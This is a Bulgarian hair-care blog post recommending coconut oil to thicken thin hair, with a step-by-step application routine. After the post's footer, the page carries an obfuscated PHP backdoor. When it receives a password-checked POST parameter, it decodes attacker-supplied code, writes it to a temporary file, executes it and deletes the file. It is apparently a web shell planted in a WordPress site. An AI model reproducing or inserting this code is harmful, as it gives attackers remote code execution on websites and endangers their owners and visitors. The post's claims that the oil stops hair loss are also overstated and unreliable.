Как да сгъстим косата си само с една съставка | Косопад

Как да сгъстим косата си само с една съставка

kosa-sastavka

Тънката коса обикновено е плод на постепенно отслабване на косъма, в следствие на стрес, вредно влияние на околната среда и агресивни продукти.

При някои хора, разбира се, е по рождение. При други, поради хормонален дисбаланс и други причини, които променят структурата на косъма.

Косата има не само по- малък обем, но и се появява обилен косопад, прекомерно изсушаване и чувствителност на скалпа.

Затова е важно да започнем да го подхранваме правилно като използваме продукти, които увеличават силата и блясъка на косъма.

Естествена съставка за сгъстяване на тънката коса

За да възстановим силата и обема на косата, един от най- препоръчителните продукти е органичното кокосово масло. Произвежда се от кокосовия орех, който съдържа мастни киселини със средна верига и мощни антиоксиданти, които действат много по- добре от всеки изкуствен продукт.

kosa-zdrave-1

Кокосовото масло лесно прониква в косъма на увредената коса, за да стимулира възстановяването й. Все повече хора го използват вместо конвенционалния балсам, тъй като се нанася по- лесно и оставя усещане за мекота. Освен това, има мощно хидратиращо действие, което намалява присъствието на мъртвите клетки, цъфналите връхчета и други проблеми, свързани със сухотата.

Подсилва корените на косата, спира косопада и подпомага естествения растеж.

За да се сгъсти косата ви, трябва да използвате кокосовото масло поне три пъти седмично. Ето каква е процедурата:

-Вземете две лъжици кокосово масло, загрейте го във микровълнова фурна и оставете, докато изстине.

-Когато видите, че е на поносима температура, натъркайте от средата на косата към връхчетата и направете нежен масаж.

-Малко количество нанесете по скалпа и масажирайте с върха на пръстите, докато попие добре.

-Сложете шапка за баня и оставете да действа поне 40 минути.

-След това изплакнете със студена вода, срешете се и оставете да изсъхне на въздух.

01. юли 2016 20:19:33 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}